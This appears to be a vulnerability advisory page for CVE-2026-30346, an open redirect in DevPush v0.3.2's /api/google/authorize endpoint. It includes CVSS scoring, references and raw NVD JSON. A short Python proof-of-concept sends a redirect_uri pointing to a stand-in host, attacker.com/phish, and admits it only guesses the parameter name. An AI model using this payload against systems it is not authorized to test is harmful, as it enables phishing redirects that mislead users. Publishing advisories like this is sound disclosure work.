CVE-2026-30346

Description

An open redirect in the /api/google/authorize endpoint of hunvreus DevPush v0.3.2 allows attackers to redirect users to malicious sites via supplying a crafted URL.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

hunvreus DevPush 0.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_open_redirect(target_url):
    # Malicious destination URL
    evil_url = "http://attacker.com/phish"
    
    # The vulnerable endpoint likely takes a redirect parameter
    # Common parameter names: redirect_uri, url, next, return
    payload_url = f"{target_url}/api/google/authorize?redirect_uri={evil_url}"
    
    try:
        # Send request, do not follow redirects to capture the Location header
        response = requests.get(payload_url, allow_redirects=False, timeout=5)
        
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            if evil_url in location:
                print(f"[+] Vulnerability Confirmed!")
                print(f"    Target: {target_url}")
                print(f"    Redirects to: {location}")
                return True
        print("[-] Vulnerability not detected or parameter name incorrect.")
        return False
        
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://localhost:8000" # Replace with actual target
    check_open_redirect(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30346
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30346
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30346/
[4] VulDB https://vuldb.com/cve/CVE-2026-30346
[5] https://gist.github.com/syphonetic/d4e519904aaa55dbd0e3b87a317660d1
[6] https://github.com/hunvreus/devpush
[7] https://github.com/hunvreus/devpush/releases/tag/0.3.2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30346", "sourceIdentifier": "[email protected]", "published": "2026-04-27T17:16:42.827", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An open redirect in the /api/google/authorize endpoint of hunvreus DevPush v0.3.2 allows attackers to redirect users to malicious sites via supplying a crafted URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://gist.github.com/syphonetic/d4e519904aaa55dbd0e3b87a317660d1", "source": "[email protected]"}, {"url": "https://github.com/hunvreus/devpush", "source": "[email protected]"}, {"url": "https://github.com/hunvreus/devpush/releases/tag/0.3.2", "source": "[email protected]"}]}}